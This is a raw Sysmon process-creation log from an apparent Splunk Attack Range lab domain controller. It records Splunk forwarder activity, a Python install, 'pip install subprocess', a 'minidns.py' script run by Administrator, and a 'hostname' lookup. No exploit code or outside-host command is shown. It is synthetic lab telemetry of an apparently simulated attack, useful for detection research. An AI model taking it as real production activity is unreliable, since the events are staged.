subprocessC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-536C-6078-AB07-00000000AE01}6768C:\Python27\Scripts\pip.exepip install subprocess 154100x800000000000000043488Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:32.071{A8622C2F-536C-6078-AB07-00000000AE01}6768C:\Python27\Scripts\pip.exe-----pip install subprocessC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000043454Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:22.953{A8622C2F-5362-6078-AA07-00000000AE01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043429Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:21.009{A8622C2F-5361-6078-A907-00000000AE01}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:20.341{A8622C2F-5360-6078-A807-00000000AE01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:19.667{A8622C2F-535F-6078-A707-00000000AE01}3156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043388Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:17.763{A8622C2F-535D-6078-A607-00000000AE01}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043378Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:17.074{A8622C2F-535D-6078-A507-00000000AE01}6884C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043368Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:16.425{A8622C2F-535C-6078-A407-00000000AE01}3012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042709Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:22.938{A8622C2F-5326-6078-A307-00000000AE01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042693Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:21.085{A8622C2F-5325-6078-A207-00000000AE01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042683Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:20.404{A8622C2F-5324-6078-A107-00000000AE01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042668Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:19.752{A8622C2F-5323-6078-A007-00000000AE01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042638Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:17.737{A8622C2F-5321-6078-9F07-00000000AE01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042623Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:17.066{A8622C2F-5321-6078-9E07-00000000AE01}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042612Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:52:16.420{A8622C2F-5320-6078-9D07-00000000AE01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042207Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:51.948{A8622C2F-5307-6078-9C07-00000000AE01}6964C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.41.481629615\700335798" -childID 6 -isForBrowser -prefsHandle 1896 -prefMapHandle 3764 -prefsLen 13178 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 7600 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000042108Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:32.687{A8622C2F-52F4-6078-9B07-00000000AE01}4256C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip.exe" install subprocessC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-52F4-6078-9A07-00000000AE01}4420C:\Python27\Scripts\pip.exepip install subprocess 154100x800000000000000042100Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:32.674{A8622C2F-52F4-6078-9A07-00000000AE01}4420C:\Python27\Scripts\pip.exe-----pip install subprocessC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000042078Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:22.930{A8622C2F-52EA-6078-9907-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042066Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:21.008{A8622C2F-52E9-6078-9807-00000000AE01}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042055Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:20.330{A8622C2F-52E8-6078-9707-00000000AE01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042045Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:19.737{A8622C2F-52E7-6078-9607-00000000AE01}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042034Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:17.737{A8622C2F-52E5-6078-9507-00000000AE01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042025Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:17.060{A8622C2F-52E5-6078-9407-00000000AE01}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000042016Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:16.559{A8622C2F-52E4-6078-9307-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000041957Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:02.587{A8622C2F-52D6-6078-9207-00000000AE01}2476C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exehostname -I C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{A8622C2F-52D6-6078-9107-00000000AE01}1800C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'" 154100x800000000000000041949Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:02.579{A8622C2F-52D6-6078-9107-00000000AE01}1800C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'"C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-52D6-6078-9007-00000000AE01}6272C:\Python27\python.exec:\Python27\python.exe minidns.py 154100x800000000000000041941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:51:02.534{A8622C2F-52D6-6078-9007-00000000AE01}6272C:\Python27\python.exe-----c:\Python27\python.exe minidns.pyC:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000041927Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:58.589{A8622C2F-52D2-6078-8F07-00000000AE01}6364C:\Python27\python.exe-----c:\Python27\python.exe minidns.py\C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000041740Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:44.698{A8622C2F-52C4-6078-8A07-00000000AE01}4416C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe10.0.14393.4222 (rs1_release.210113-1739)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=1571A4132449A317F66DF783E9468783,SHA256=5CFF48937FAE7F0CF5935248959141E2A60E88FE8105C43676B866FDAC36ADD2,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000041731Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:44.665{A8622C2F-52C4-6078-8907-00000000AE01}4752C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000040799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:39.137{A8622C2F-52BF-6078-8707-00000000AE01}6128C:\Python27\python.exe-----"C:\Python27\python.exe" -m ensurepip -U --default-pipC:\Windows\SysWOW64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-52BF-6078-8607-00000000AE01}3008C:\Windows\SysWOW64\msiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3498711333DBB15B306BB85B274C0C71 154100x800000000000000040789Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:39.091{A8622C2F-52BF-6078-8607-00000000AE01}3008C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3498711333DBB15B306BB85B274C0C71C:\Windows\SysWOW64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA,IMPHASH=B4730776DFCE61DBCD10D002E3D530E1{A8622C2F-52B5-6078-8307-00000000AE01}6448C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 154100x800000000000000040623Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:50:33.981{A8622C2F-52B9-6078-8507-00000000AE01}3780C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 